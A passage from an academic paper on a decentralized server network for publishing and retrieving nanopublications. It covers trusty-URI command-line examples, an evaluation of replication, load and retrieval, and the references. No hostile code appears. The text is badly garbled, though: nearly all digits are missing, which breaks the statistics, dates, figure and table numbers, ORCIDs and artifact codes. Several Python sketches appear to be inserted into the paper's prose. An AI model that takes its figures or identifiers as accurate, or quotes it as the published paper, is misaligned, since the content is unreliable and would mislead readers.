the provenance and publication info graphs provide meta-information about the assertion and the entire nanopublication, respectively:

:provenance {
  :assertion prov:wasderivedfrom ex:mypublication.
}

:pubinfo {
  : pav:createdby <http://orcid.org/ - - - >.
  : dc:created " - - t : : + : "^^xsd:datetime.
}

the lines above constitute a very simple but complete nanopublication. to make this example a bit more interesting, let us define two more nanopublications that have different assertions but are otherwise identical:

@prefix : <http://example.org/np #>.
...
ex:gene ex:isrelatedto ex:malaria.
...

@prefix : <http://example.org/np #>.
...
ex:gene ex:isrelatedto ex:malaria.
...

we save these nanopublications in a file nanopubs.trig, and before we can publish them, we have to assign them trusty uris:

$ np mktrusty -v nanopubs.trig
nanopub uri: http://example.org/np #raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
nanopub uri: http://example.org/np #rat swlslymbud kzjsyhvv om wrhlurxmrvpkzcduq
nanopub uri: http://example.org/np #rakvupysi ql itlc -iijmg yst -pi dajxcmafu s

this gives us the file trusty.nanopubs.trig, which contains transformed versions of the three nanopublications that now have trusty uris as identifiers, as shown by the output lines above.
looking into the file we can verify that nothing has changed with respect to the content, and now we are ready to publish them:

$ np publish trusty.nanopubs.trig
nanopubs published at http://np.inn.ac/

for each of these nanopublications, we can check their publication status with the following command (referring to the nanopublication by its uri or just its artifact code):

$ np status -a raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
url: http://np.inn.ac/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
found on nanopub server.

this is what you see immediately after publication. only one server knows about the new nanopublication. some minutes later, however, the same command leads to something like this:

$ np status -a raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
url: http://np.inn.ac/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
url: http://ristretto.med.yale.edu: /nanopub-server/raqozlp lhivtyqhcospbu...
url: http://nanopubs.stanford.edu/nanopub-server/raqozlp lhivtyqhcospbutx yeg...
url: http://nanopubs.semanticscience.org: /raqozlp lhivtyqhcospbutx yegs y...
url: http://rdf.disgenet.org/nanopub-server/raqozlp lhivtyqhcospbutx yegs y a...
url: http://app.tkuhn.eculture.labs.vu.nl/nanopub-server- /raqozlp lhivtyqhco...
url: http://nanopubs.restdesc.org/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
url: http://nanopub.backend .scify.org/nanopub-server/raqozlp lhivtyqhcospbut...
url: http://nanopub.exynize.com/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i
found on nanopub servers.

next, we can make an index pointing to these three nanopublications:

$ np mkindex -o index.nanopubs.trig trusty.nanopubs.trig
index uri: http://np.inn.ac/raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le

this creates a local file index.nanopubs.trig containing the index, identified by the uri shown above. as this index is itself a nanopublication, we can publish it in the same way:

$ np publish index.nanopubs.trig
nanopub published at http://np.inn.ac/

once published, we can check the status of this index and its contained nanopublications:

$ np status -r raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le
index nanopub; content nanopubs

again, after just a few minutes this nanopublication will be distributed in the network and available on multiple servers. from this point on, everybody can conveniently and reliably retrieve the given set of nanopublications. the only thing one needs to know is the artifact code of the trusty uri of the index:

$ np get -c raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le

this command downloads the nanopublications of the index we just created and published. as another exemplary scenario, let us imagine a researcher in the biomedical domain who is interested in the protein cdkn a and who has derived some conclusion based on the data found in existing nanopublications.
specifically, let us suppose this researcher analyzed the five nanopublications specified by the following artifact codes (they can be viewed online by appending the artifact code to the url http://np.inn.ac/ or the url of any other nanopublication server): raeoxlty pejybzwa fubj ogsqujobfitofmbumkbjh raomw xmemwkejcnwlft cgrmg_tgjfvssh hgfemcz ra bh_gncwek_uxfgtvhcmvz hw eupaccddho tiow ra hvj no md d m u-oc bpxlxiwyn l wvb jnttxk rasx-fnzwjzluqrde gvmwfeywlok s ntnkyelwapwno these nanopublications about the same protein come from two different sources: the first one is from the bel nanopub dataset, whereas the remaining four are from nextprot. (see https://github.com/tkuhn/bel nanopub and http://nextprot rdf.sourceforge.net, respectively, and table .) these nanopublications can be downloaded as above with the np get command and stored in a file, which we name here cdkn a-nanopubs.trig. in order to be able to refer to such a collection of nanopublications with a single identifier, a new index is needed that contains just these five nanopublications. this time we give the index a title (which is optional). $ np mkindex -t "data about cdkn a from bel nanopub & nextprot" \ -o index.cdkn a-nanopubs.trig cdkn a-nanopubs.trig index uri: http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy the generated index is stored in the file index.cdkn a-nanopubs.trig, and our exemplary researcher can now publish this index to let others know about it: $ np publish index.cdkn a-nanopubs.trig nanopub published at http://np.inn.ac/ kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/tkuhn/bel nanopub http://nextprot rdf.sourceforge.net http://dx.doi.org/ . /peerj-cs. table existing datasets in the nanopublication format, five of which were used for the first part of the evaluation. dataset # nanopublications # triples used for evaluation part name and citation index content index content generif/aida , , , , first (np index ray_lqruua, ) openbel . , , , , first (np index racy i f_w, ) openbel , , , , first (np index rar dwelyl, ) disgenet v . . . , , , , first (np index raxy hxq, ) disgenet v . . . , , , , , , , none (np index ravekrw m , ) nextprot , , , , , , , first (np index raxflg ym, ) liddi , , , , third (np index ra suq e , ) total , , , , , , , there is no need to publish the five nanopublications this index is referring to, because they are already public (this is how we got them in the first place). the index uri can now be used to refer to this new collection of existing nanopublications in an unambiguous and reliable manner. this uri can be included in the scientific publication that explains the new finding, for example with a reference like the following: [ ] data about cdkn a from bel nanopub & nextprot. nanopublication index http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy, april . in this case with just five nanopublications, one might as well refer to them individually, but this is obviously not an option for cases where we have hundreds or thousands of them. the given web link allows everybody to retrieve the respective nanopublications via the server np.inn.ac. the url will not resolve should the server be temporarily or permanently down, but because it is a trusty uri we can retrieve the nanopublications from any other server of the network following a well-defined protocol (basically just extracting the artifact code, i.e., the last characters, and appending it to the url of another nanopublication server). 
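as noted above, any nanopublication or index can be fetched by appending its artifact code to the base url of any server of the network, which is what makes such references robust against individual servers disappearing. the following minimal python sketch shows this kind of client-side fallback; the listed server urls and the assumed length of the artifact code are illustrative only, and the returned content should additionally be verified against its trusty uri.

from urllib.request import urlopen

# base urls of some nanopublication servers (illustrative; any servers
# of the network would do)
SERVERS = [
    "http://np.inn.ac/",
    "http://nanopubs.stanford.edu/nanopub-server/",
    "http://nanopubs.restdesc.org/",
]

def fetch_nanopub(trusty_uri_or_code, artifact_code_length=45, timeout=10):
    # the artifact code is the final, fixed-length part of a trusty uri;
    # the length used here is an assumption for illustration
    code = trusty_uri_or_code[-artifact_code_length:]
    for base in SERVERS:
        try:
            with urlopen(base + code, timeout=timeout) as response:
                return response.read()   # content should then be verified
        except OSError:
            continue                     # server unreachable: try the next one
    raise RuntimeError("nanopublication not found on any known server")

# usage sketch:
# data = fetch_nanopub("http://example.org/np.<artifact code>")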
this reference is therefore much more reliable and more robust than links to other types of data repositories. in fact, we refer to the datasets we use in this publication for evaluation purposes, as described below in ‘evaluation’, in exactly this way (np index ray_lqruua, ; np index racy i f_w, ; np index rar dwelyl, ; np index raxy hxq, ; np index ravekrw m , ; np index raxflg ym, ; np index ra suq e , ). kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy http://dx.doi.org/ . /peerj-cs. figure the web interface of the nanopublication validator can load nanopublications by their trusty uri (or just their artifact code) from the nanopublication server network. it also allows users to directly publish uploaded nanopublications. the new finding that was deduced from the given five nanopublications can, of course, also be published as a nanopublication, with a reference to the given index uri in the provenance part: @prefix : <http://example.org/myfinding#>. ... @prefix nps: <http://np.inn.ac/>. @prefix uniprot: <http://purl.uniprot.org/uniprot/>. ... :assertion { uniprot:p a ex:proteinwithpropertyx. } :provenance { :assertion prov:wasinfluencedby nps:ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy. } :pubinfo { : pav:createdby <http://orcid.org/ - - - >. : dc:created " - - t : : + : "^^xsd:datetime. } we can again transform it to a trusty nanopublication , and then publish it as above. some of the features of the presented command-line interface are made available through a web interface for dealing with nanopublications that is shown in fig. . the supported features include the generation of trusty uris, as well as the publication and retrieval of nanopublications. the interface allows us to retrieve, for example, the nanopublication we just generated and published above, even though we used an example.org uri, which is not directly resolvable. unless it is just about toy examples, we should of course try to use kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure this screenshot of the nanopublication monitor interface (http://npmonitor.inn.ac ) showing the current server network. it currently consists of server instances on physical servers in zurich, new haven, ottawa, amsterdam, stanford, barcelona, ghent, athens, leipzig, and haverford. resolvable uris, but with our decentralized network we can retrieve the data even if the original link is no longer functioning or temporarily broken. evaluation to evaluate our approach, we want to find out whether a small server network run on normal web servers, without dedicated infrastructure, is able to handle the amount of nanopublications we can expect to become publicly available in the next few years. our evaluation consists of three parts focusing on the different aspects of dataset publication, server performance, and dataset retrieval, respectively. at the time the first part of the evaluation was performed, the server network consisted of three servers in zurich, new haven, and ottawa. seven new sites in amsterdam, stanford, barcelona, ghent, athens, leipzig, and haverford have joined the network since. the current network of server instances on sites (in countries) is shown in fig. , which is a screenshot of a nanopublication monitor that we have implemented (https://github.com/tkuhn/nanopub- monitor). 
such monitors regularly check the nanopublication server network, register changes (currently once per minute), and test the response times and the correct operation of the servers by requesting a random nanopublication and verifying the returned data. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://npmonitor.inn.ac https://github.com/tkuhn/nanopub-monitor https://github.com/tkuhn/nanopub-monitor http://dx.doi.org/ . /peerj-cs. the files of the presented studies are available online in two repositories, one for the analyses of the original studies that have been previously published (https://bitbucket.org/ tkuhn/trustypublishing-study/) and another one with the files for the additional analyses and diagrams for this extended article (https://bitbucket.org/tkuhn/trustypublishingx- study/). evaluation design table shows seven existing large nanopublication datasets. five of these datasets were used for the first part of the evaluation (the other two were not yet available at the time this part of the evaluation was conducted), which tested the ability of the network to store and distribute new datasets. these five datasets consist of a total of more than million nanopublications and close to million rdf triples, including nanopublication indexes that we generated for each dataset. the total size of these five datasets when stored as uncompressed trig files amounts to . gb. each of the datasets is assigned to one of the three servers, where it is loaded from the local file systems. the first nanopublications start spreading to the other servers, while others are still being loaded from the file system. we therefore test the reliability and capacity of the network under constant streams of new nanopublications coming from different servers, and we use two nanopublication monitors (in zurich and ottawa) to evaluate the responsiveness of the network. in the second part of the evaluation we expose a server to heavy load from clients to test its retrieval capacity. for this we use a service called load impact (https://loadimpact.com) to let up to clients access a nanopublication server in parallel. we test the server in zurich over a time of five minutes under the load from a linearly increasing number of clients (from to ) located in dublin. these clients are programmed to request a randomly chosen journal page, then to go though the entries of that page one by one, requesting the respective nanopublication with a probability of %, and starting over again with a different page. as a comparison, we run a second session, for which we load the same data into a virtuoso sparql endpoint on the same server in zurich (with gb of memory given to virtuoso and two . ghz intel xeon processors). then, we perform exactly the same stress test on the sparql endpoint, requesting the nanopublications in the form of sparql queries instead of requests to the nanopublication server interface. this comparison is admittedly not a fair one, as sparql endpoints are much more powerful and are not tailor-made for the retrieval of nanopublications, but they provide nevertheless a valuable and well-established reference point to evaluate the performance of our system. while the second part of the evaluation focuses on the server perspective, the third part considers the client side. in this last part, we want to test whether the retrieval of an entire dataset in a parallel fashion from the different servers of the network is indeed efficient and reliable. 
we decided to use a medium-sized dataset and chose liddi (np index ra suq e , ), which consists of around , triples. we tested the retrieval of this dataset from a computer connected to the internet via a basic plan from a regular internet service provider (i.e., not via a fast university network) with a command like the following:

$ np get -c -o nanopubs.trig ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg

figure: this diagram shows the rate at which nanopublications are loaded at their first, second, and third server, respectively, over the time of the evaluation. at the first server, nanopublications are loaded from the local file system, whereas at the second and third server they are retrieved via the server network.

in addition, we wanted to test the retrieval in a situation where the internet connection and/or the nanopublication servers are highly unreliable. for that, we implemented a version of an input stream that introduces errors to simulate such unreliable connections or servers. with a given probability (set to % for this evaluation), each read attempt to the input stream (a single read attempt typically asking for about bytes) either leads to a randomly changed byte or to an exception being thrown after a delay of s (both having an equal chance of occurring of . %). this behavior can be achieved with the following command, which is obviously only useful for testing purposes:

$ np get -c -o nanopubs.trig --simulate-unreliable-connection \
  ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg

for the present study, we run each of these two commands times. to evaluate the result, we can investigate whether the downloaded sets of nanopublications are equivalent, i.e., lead to identical files when normalized (such as transformed to a sorted n-quads representation). furthermore, we can look into the amount of time this retrieval operation takes, and the number of times the retrieval of a single nanopublication from a server fails and has to be repeated.
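the error-injecting input stream described above was implemented in the java client behind the --simulate-unreliable-connection option; the following is a rough python sketch of the same idea, not a reimplementation of that code. the concrete probabilities and the delay are placeholder values, since the exact figures are not reproduced in this version of the text.

import random
import time

class UnreliableStream:
    # fault-injection wrapper: with probability p_fail a read raises an
    # error after a fixed delay, and with probability p_corrupt it
    # returns data with one randomly changed byte; probabilities and
    # delay are assumptions for illustration
    def __init__(self, stream, p_corrupt=0.005, p_fail=0.005, fail_delay=1.0):
        self.stream = stream
        self.p_corrupt = p_corrupt
        self.p_fail = p_fail
        self.fail_delay = fail_delay

    def read(self, size=-1):
        roll = random.random()
        if roll < self.p_fail:
            time.sleep(self.fail_delay)
            raise IOError("simulated connection failure")
        data = bytearray(self.stream.read(size))
        if data and roll < self.p_fail + self.p_corrupt:
            data[random.randrange(len(data))] ^= 0xFF   # flip one byte
        return bytes(data)

# usage sketch: wrap any binary stream; corrupted downloads are detected
# by the trusty-uri check on the client and are simply retried
# noisy = UnreliableStream(open("nanopub.trig", "rb"))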
evaluation results
the first part of the evaluation lasted h and min, at which point all nanopublications were replicated on all three servers, and therefore the nanopublication traffic came to an end. figure shows the rate at which the nanopublications were loaded at their first, second, and third server, respectively. the network was able to handle an average of about , new nanopublications per hour, which corresponds to more than new nanopublications per second. this includes the time needed for loading each nanopublication once from the local file system (at the first server), transferring it through the network two times (to the other two servers), and for verifying it three times (once when loaded and twice when received by the other two servers). figure shows the response times of the three servers as measured by the two nanopublication monitors in zurich (top) and ottawa (bottom) during the time of the evaluation. we see that the observed latency is mostly due to the geographical distance between the servers and the monitors. the response time was always less than . s when the server was on the same continent as the measuring monitor. in . % of all cases (including those across continents) the response time was below . s, and it was always below . s. not a single one of the , individual http requests timed out, led to an error, or received a nanopublication that could not be successfully verified.

figure: server response times under heavy load, recorded by the monitors during the first evaluation (axes: time from start of test in seconds; response time in seconds).

figure shows the result of the second part of the evaluation. the nanopublication server was able to handle , requests in total (i.e., an average of requests per second) with an average response time of . s. in contrast, the sparql endpoint answering the same kind of requests needed times longer to process them ( s on average), consequently handled about times fewer requests ( ), and started to hit the timeout of s for some requests when more than client accessed it in parallel. in the case of the nanopublication server, the majority of the requests were answered within less than . s for up to around parallel clients, and this value remained below . s all the way up to clients. as the round-trip network latency alone between ireland and zurich amounts to around . to . s, further improvements can be achieved for a denser network due to the reduced distance to the nearest server.

figure: results of the evaluation of the retrieval capacity of a nanopublication server as compared to a general sparql endpoint, plotted against the number of clients accessing the service in parallel (note the logarithmic y-axis).

for the third part of the evaluation, all forty retrieval attempts succeeded. after normalization of the downloaded datasets, they were all identical, also the ones that were downloaded through an input stream that was artificially made highly unreliable. figure shows the number of retrieval failures and the amount of time that was required for the retrieval. with the normal connection, the downloading of nanopublications from the network almost always succeeded on the first try. of the , nanopublications that had to be downloaded ( , content nanopublications plus nanopublication indexes), fewer than such download attempts failed in of the test runs. in the remaining two runs, the connection happened to be temporarily unreliable for ''natural'' reasons, and the number of download failures rose to and , , respectively. this, however, had no effect on the success of the download in a timely manner. on average over the test runs, the entire dataset was successfully downloaded in s, with a maximum of s. unsurprisingly, the unreliable connection leads to a much larger average number of failures and retries, but these failures have no effect on the final downloaded dataset, as we have seen above. on average, , download attempts failed and had to be retried in the unreliable setting.

figure: the number of failures and required time when downloading the liddi dataset from the server network over a normal connection as well as a connection that has been artificially made unreliable (panels: number of failed attempts to download a nanopublication; time to download the entire dataset in seconds).
in particular because half of these failures included a delay of s, the download times are more than doubled, but still in a very reasonable range with an average of s and a maximum below min. in summary, the first part of the evaluation shows that the overall replication capacity of the current server network is around . million new nanopublications per day or . billion per year. the results of the second part show that the load on a server when measured as response times is barely noticeable for up to parallel clients, and therefore kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the network can easily handle ·x parallel client connections or more, where x is the number of independent physical servers in the network (currently x = ). the second part thereby also shows that the restriction of avoiding parallel outgoing connections for the replication between servers is actually a very conservative measure that could be relaxed, if needed, to allow for a higher replication capacity. the third part of the evaluation shows that the client-side retrieval of entire datasets is indeed efficient and reliable, even if the used internet connection or some servers in the network are highly unreliable. discussion and conclusion we have presented here a low-level infrastructure for data sharing, which is just one piece of a bigger ecosystem to be established. the implementation of components that rely on this low-level data sharing infrastructure is ongoing and future work. this includes the development of ‘‘core services’’ (see ‘architecture’) on top of the server network to allow people to find nanopublications and ‘‘advanced services’’ to query and analyze the content of nanopublications. in addition, we need to establish standards and best practices of how to use existing ontologies (and to define new ones where necessary) to describe properties and relations of nanopublications, such as referring to earlier versions, marking nanopublications as retracted, and reviewing of nanopublications. apart from that, we also have to scale up the current small network. as our protocol only allows for simple key-based lookup, the time complexity for all types of requests is sublinear and therefore scales up well. the main limiting factor is disk space, which is relatively cheap and easy to add. still, the servers will have to specialize even more, i.e., replicate only a part of all nanopublications, in order to handle really large amounts of data. in addition to the current surface feature definitions via uri and hash patterns, a number of additional ways of specializing are possible in the future: servers can restrict themselves to particular types of nanopublications, e.g., to specific topics or authors, and communicate this to the network in a similar way as they do it now with uri and hash patterns; inspired by the bitcoin system, certain servers could only accept nanopublications whose hash starts with a given number of zero bits, which makes it costly to publish; and some servers could be specialized to new nanopublications, providing fast access but only for a restricted time, while others could take care of archiving old nanopublications, possibly on tape and with considerable delays between request and delivery. 
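as a minimal illustration of the bitcoin-inspired acceptance rule mentioned above (servers accepting only nanopublications whose hash starts with a given number of zero bits, which makes publishing costly), the following python snippet counts leading zero bits of a digest. the use of sha-256 over the serialized content, and the required number of zero bits, are assumptions purely for illustration and are not part of the current protocol.

import hashlib

def leading_zero_bits(digest: bytes) -> int:
    # count how many bits at the start of the digest are zero
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits

def accepted(content: bytes, required_zero_bits: int = 16) -> bool:
    # illustrative acceptance rule: the publisher must vary the content
    # (e.g., a nonce in the publication info) until the hash happens to
    # start with enough zero bits
    digest = hashlib.sha256(content).digest()
    return leading_zero_bits(digest) >= required_zero_bits

print(accepted(b"some serialized nanopublication", 4))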
lastly, there could also emerge interesting synergies with novel approaches to internet networking, such as content-centric networking (jacobson et al., ), with which—consistent with our proposal—requests are based on content rather than hosts. we argue that data publishing and archiving can and should be done in a decentralized manner. we believe that the presented server network can serve as a solid basis for semantic publishing, and possibly also for the semantic web in general. it could contribute to improve the availability and reproducibility of scientific results and put a reliable and trustworthy layer underneath the semantic web. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding ruben verborgh is a postdoctoral fellow of the research foundation–flanders (fwo). the other authors received no particular funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: research foundation–flanders (fwo). competing interests christine chichester is an employee of nestle institute of health sciences, lausanne, switzerland. george giannakopoulos is an employee of scify, a private not-profit company, athens, greece. author contributions • tobias kuhn conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • christine chichester conceived and designed the experiments, reviewed drafts of the paper. • michael krauthammer, núria queralt-rosinach, george giannakopoulos and axel- cyrille ngonga ngomo performed the experiments, reviewed drafts of the paper. • ruben verborgh and raffaele viglianti performed the experiments, wrote the paper, reviewed drafts of the paper. • michel dumontier conceived and designed the experiments, performed the experiments, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: source code: - java library for nanopublications: https://github.com/nanopublication/nanopub-java - nanopublication server: https://github.com/tkuhn/nanopub-server - nanopublication monitor: https://github.com/tkuhn/nanopub-monitor content data: - all datasets: https://datahub.io/organization/nanopublications - https://datahub.io/dataset/disgenet-v - - - -nanopubs - https://datahub.io/dataset/nextprot-preliminary-nanopubs - https://datahub.io/dataset/openbel- - -nanopubs - https://datahub.io/dataset/openbel- -nanopubs - https://datahub.io/dataset/generif-aida-nanopubs - https://datahub.io/dataset/linked-drug-drug-interactions-liddi kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/nanopublication/nanopub-java https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-monitor https://datahub.io/organization/nanopublications https://datahub.io/dataset/disgenet-v - - - -nanopubs https://datahub.io/dataset/nextprot-preliminary-nanopubs https://datahub.io/dataset/openbel- - -nanopubs https://datahub.io/dataset/openbel- -nanopubs https://datahub.io/dataset/generif-aida-nanopubs https://datahub.io/dataset/linked-drug-drug-interactions-liddi http://dx.doi.org/ . /peerj-cs. 
- https://datahub.io/dataset/disgenet-v - - - -nanopubs evaluation data: - repo with data and scripts of conference paper: https://bitbucket.org/tkuhn/ trustypublishing-study/ - repo with some additional content for this extended journal article: https: //bitbucket.org/tkuhn/trustypublishingx-study/. references banda jm, kuhn t, shah nh, dumontier m. . provenance-centered dataset of drug-drug interactions. in: proceedings of the th international semantic web conference (iswc ). berlin heidelberg: springer, – . belhajjame k, corcho o, garijo d, zhao j, missier p, newman d, palma r, bechhofer s, garcıa cuesta e, gómez-pérez jm, kyle g, page k, roos m, ruiz je, soiland- reyes s, verdes-montenegro l, de roure d, goble ca. . workflow-centric research objects: first class citizens in scholarly discourse. in: proceedings of sepublica . ceur-ws. berners-lee t. . linked data—design issues. available at http://www.w .org/ designissues/linkeddata.html. bradley j. . documents and data: modelling materials for humanities research in xml and relational databases. literary and linguistic computing ( ): – doi . /llc/fqh . buil-aranda c, hogan a, umbrich j, vandenbussche py. . sparql web- querying infrastructure: ready for action? in: the semantic web–iswc . berlin heidelberg: springer, – . carroll j, bizer c, hayes p, stickler p. . named graphs, provenance and trust. in: proceedings of www’ . new york: acm, – . chichester c, gaudet p, karch o, groth p, lane l, bairoch a, mons b, loizou a. . querying nextprot nanopublications and their value for insights on sequence variants and tissue expression. web semantics: science, services and agents on the world wide web : – . chichester c, karch o, gaudet p, lane l, mons b, bairoch a. . converting nextprot into linked data and nanopublications. semantic web ( ): – . clarke i, sandberg o, wiley b, hong tw. . freenet: a distributed anonymous in- formation storage and retrieval system. in: designing privacy enhancing technologies. berlin heidelberg: springer, – . cohen jp, lo hz. . academic torrents: a community-maintained distributed repository. in: proceedings of xsede ’ . new york: acm, . feigenbaum l, williams gt, clark kg, torres e. . sparql . protocol recom- mendation w c. available at http://www.w .org/tr/sparql -protocol/ . filali i, bongiovanni f, huet f, baude f. . a survey of structured p p systems for rdf data storage and retrieval. in: transactions on large-scale data- and knowledge- centered systems iii. berlin heidelberg: springer, – . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://datahub.io/dataset/disgenet-v - - - -nanopubs https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ http://www.w .org/designissues/linkeddata.html http://www.w .org/designissues/linkeddata.html http://dx.doi.org/ . /llc/fqh http://www.w .org/tr/sparql -protocol/ http://dx.doi.org/ . /peerj-cs. freedman r. . the renaissance chanson goes digital: digitalduchemin. org. early music ( ): – doi . /em/cau . fu k, kaashoek mf, mazières d. . fast and secure distributed read-only file system. acm transactions on computer systems ( ): – doi . / . . golden p, shaw r. . nanopublication beyond the sciences: the periodo period gazetteer. peerj computer science :e doi . /peerj-cs. . gray aj, baran j, marshall ms, dumontier m. . dataset descriptions: hcls community profile. 
interest group note, w c (may ). available at http://www. w .org/tr/hcls-dataset. groth p, gibson a, velterop j. . the anatomy of a nano-publication. information services and use ( ): – . han l, finin t, parr c, sachs j, joshi a. . rdf : from spreadsheets to rdf. in: proceedings of the th international conference on the semantic web. berlin heidelberg: springer, – . harris s, seaborne a. . sparql . query language recommendation w c. available at http://www.w .org/tr/sparql -query/ . hartig o. . an overview on execution strategies for linked data queries. datenbank- spektrum ( ): – doi . /s - - - . jacobson v, smetters dk, thornton jd, plass m, briggs n, braynard r. . network- ing named content. communications of the acm ( ): – . kuhn t. . a survey and classification of controlled natural languages. computa- tional linguistics ( ): – doi . /coli_a_ . kuhn t. a. nanopub-java: a java library for nanopublications. in: proceedings of the th workshop on linked science (lisc ). kuhn t. b. science bots: a model for the future of scientific computation? in: www companion proceedings. new york: acm, – . kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: proceedings of eswc . berlin heidelberg: springer, – . kuhn t, chichester c, krauthammer m, dumontier m. . publishing without publishers: a decentralized approach to dissemination, retrieval, and archiving of data. in: proceedings of the th international semantic web conference (iswc ), lecture notes in computer science. berlin heidelberg: springer. kuhn t, dumontier m. . trusty uris: verifiable, immutable, and permanent digital artifacts for linked data. in: proceedings of eswc . berlin heidelberg: springer, – . kuhn t, dumontier m. . making digital artifacts on the web verifiable and reliable. ieee transactions on knowledge and data engineering ( ): – . kuhn t, royer l, fuchs ne, schroeder m. . improving text mining with controlled natural language: a case study for protein interations. in: proceedings dils’ . berlin heidelberg: springer. ladwig g, harth a. . cumulusrdf: linked data management on nested key-value stores. in: proceedings of ssws . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /em/cau http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. http://www.w .org/tr/hcls-dataset http://www.w .org/tr/hcls-dataset http://www.w .org/tr/sparql -query/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /coli_a_ http://dx.doi.org/ . /peerj-cs. markman c, zavras c. . bittorrent and libraries: cooperative data publishing, man- agement and discovery. d-lib magazine ( ) doi . /march -markman. mccusker jp, lebo t, krauthammer m, mcguinness dl. . next generation cancer data discovery, access, and integration using prizms and nanopublications. in: proceedings of dils . berlin heidelberg: springer, – . miller a, juels a, shi e, parno b, katz j. . permacoin: repurposing bitcoin work for data preservation. in: proceedings of the ieee symposium on security and privacy (sp). piscataway: ieee, – . mons b, van haagen h, chichester c, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . np index ra suq e . . linked drug-drug interactions (liddi). nanopublication index. available at http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmn aztfsdmrxg. np index racy i f_w. . nanopubs converted from openbel’s small and large corpus . . 
nanopublication index. available at http://np.inn.ac/racy i f_ wr ol bhnd ekju glf-wp opbdbyve p o. np index rar dwelyl. . nanopubs converted from openbel’s small and large corpus . nanopublication index. available at http://np.inn.ac/ rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw. np index ravekrw m . . nanopubs extracted from disgenet v . . . . nanopublication index. available at http://np.inn.ac/ravekrw m ly_ pjmhcxczmr fyilzzqjowt cgcwd_ c. np index raxflg ym. . nanopubs converted from nextprot protein data (prelimi- nary). nanopublication index. available at http://np.inn.ac/raxflg ymi a su o f ema msp hwys mftvyredezrg. np index raxy hxq. . nanopubs extracted from disgenet v . . . . nanopubli- cation index. available at http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa- qa dipr lig q. np index ray_lqruua. . aida nanopubs extracted from generif. nanopublica- tion index. available at http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuil ghswgm zwni. paskin n. . digital object identifiers for scientific data. data science journal : – doi . /dsj. . . patrinos gp, cooper dn, van mulligen e, gkantouna v, tzimas g, tatum z, schultes e, roos m, mons b. . microattribution and nanopublication as means to incentivize the placement of human genome variation data into the public domain. human mutation ( ): – doi . /humu. . proell s, rauber a. . a scalable framework for dynamic data citation of arbitrary structured data. in: rd international conference on data management technologies and applications (data ). kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /march -markman http://dx.doi.org/ . /ng - http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg http://np.inn.ac/racy i f_wr ol bhnd ekju glf-wp opbdbyve p o http://np.inn.ac/racy i f_wr ol bhnd ekju glf-wp opbdbyve p o http://np.inn.ac/rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw http://np.inn.ac/rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw http://np.inn.ac/ravekrw m ly_pjmhcxczmr fyilzzqjowt cgcwd_ c http://np.inn.ac/ravekrw m ly_pjmhcxczmr fyilzzqjowt cgcwd_ c http://np.inn.ac/raxflg ymi a su of ema msp hwys mftvyredezrg http://np.inn.ac/raxflg ymi a su of ema msp hwys mftvyredezrg http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa-qa dipr lig q http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa-qa dipr lig q http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuilghswgm zwni http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuilghswgm zwni http://dx.doi.org/ . /dsj. . http://dx.doi.org/ . /humu. http://dx.doi.org/ 